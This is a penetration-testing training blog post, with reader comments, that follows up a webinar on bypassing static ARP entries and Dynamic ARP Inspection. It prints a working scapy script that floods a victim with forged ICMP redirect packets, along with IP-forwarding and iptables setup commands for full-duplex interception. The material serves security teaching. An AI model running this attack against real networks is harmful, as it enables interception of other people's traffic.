eLearnSecurity Blog

Sneaky MITM Attack – Solutions

Should I Stay or Should I Go

Hi everyone,

On October 20th, we at eLearnSecurity presented a webinar titled: Sneaky Man in the Middle Attack Exposed.

We had a lot of people attending with many enthusiastic comments and interesting questions. Thanks to everyone who made it!

In the webinar I demonstrated live how to circumvent common anti-man-in-the-middle techniques such as:

  • Static ARP tables
  • The Dynamic ARP Inspection feature of enterprise level switches

Dynamic ARP Inspection

It is possbile to bypass these countermeasures by using a really neat networking feature: the ICMP redirect packets. This family of packets lets a router push to the clients different routes for a certain destination and are usually used to improve network efficiency.

Anyway, as some of you are probably thinking, this is not something completely new. Tools like Ettercap can use this technique to mount a half-duplex man-in-the-middle attack. As usual, we penetration tester never settle down, so we want more!

I then demonstrated how to use a very common networking technique to upgrade the attack to a full-duplex interception. It gets really fun when you use some everyday concepts in a new and interesting way. It surely has been for me and the people watching the live webinar.

You can access the full video and the rest of our technical webinars here – Sneaky Man in the Middle attack Exposed.

In the video you will see all the technical details about the attack and the whole approach used to create it.

But, what is a webinar without some free goodies for you guys!? Please find the scapy script used to mount the attack at the end of this blog post. Moreover we just released for free a very similar scenario for all our PTP students! If you are one of our students you will find a new lab scenario included in your Hera Lab subscription today.

As promised during the webinar, here is the scapy code:


# MitM against:
#  - static ARP entries
#  - Dynamic ARP inspection

# Prerequisites:
# echo 1 > /proc/sys/net/ipv4/ip_forward
# iptables -t nat -A POSTROUTING -s 10.100.13.0/255.255.255.0 -o tap0 -j MASQUERADE

# Creating and sending ICMP redirect packets between these entities:
originalRouterIP=''
attackerIP=''
victimIP=''
serverIP=''

# Here we create an ICMP Redirect packet
ip=IP()
ip.src=originalRouterIP
ip.dst=victimIP
icmpRedirect=ICMP()
icmpRedirect.type=5
icmpRedirect.code=1
icmpRedirect.gw=attackerIP

# The ICMP packet payload /should/ :) contain the original TCP SYN packet
# sent from the victimIP
redirPayloadIP=IP()
redirPayloadIP.src=victimIP
redirPayloadIP.dst=serverIP
fakeOriginalTCPSYN=TCP()
fakeOriginalTCPSYN.flags="S"
fakeOriginalTCPSYN.dport=80
fakeOriginalTCPSYN.seq=444444444
fakeOriginalTCPSYN.sport=55555

# Release the Kraken!
while True:
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)


 

Questions? Ideas? Leave a comment!

Thanks for reading and happy hacking.

4 Comments

  • raj says:

    not getting the link to view the full presentation. tried different times with different ids.. can you send me the link to watch the video..

  • GiRa says:

    Hi Raj,
    I don’t know if I fully understand you. Do you mean that you filled the form and you did not get a link in your email inbox?

  • Alfredo says:

    Good night, you can help me with this error that I get.

    >>> # Release the Kraken!
    >>> while True:
    … send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
    File “”, line 2
    send(ip/icmpRedirect/redirPayloadIP/fakeOriginalTCPSYN)
    ^
    IndentationError: expected an indented block

Leave a Reply

Your email address will not be published.

Go to top of page